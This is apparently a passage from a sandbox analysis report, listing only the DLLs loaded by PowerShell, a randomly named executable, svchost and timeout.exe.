            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: apphelp.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: sspicli.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: wininet.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: rstrtmgr.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: ncrypt.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: ntasn1.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: dbghelp.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: iertutil.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: windows.storage.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: wldp.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: profapi.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: kernel.appcore.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: winhttp.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: mswsock.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: iphlpapi.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: winnsi.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: urlmon.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: srvcli.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: netutils.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: dnsapi.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: rasadhlp.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: fwpuclnt.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: schannel.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: mskeyprotect.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: msasn1.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: dpapi.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: cryptsp.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: rsaenh.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: cryptbase.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: gpapi.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: ncryptsslp.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: ntmarta.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: uxtheme.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: windowscodecs.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: propsys.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: windows.fileexplorer.common.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: ntshrui.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: cscapi.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: linkinfo.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: edputil.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: wintypes.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: appresolver.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: bcp47langs.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: slc.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: userenv.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: sppc.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: pcacli.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: mpr.dll
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeSection loaded: sfc_os.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: webio.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: winnsi.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: usermgrcli.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelclient.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: coremessaging.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: twinapi.appcore.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: resourcepolicyclient.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: vssapi.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: vsstrace.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: samcli.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: samlib.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: es.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: bitsproxy.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: schannel.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: mskeyprotect.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: ntasn1.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: ncrypt.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: ncryptsslp.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: dpapi.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: mpr.dll
            Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
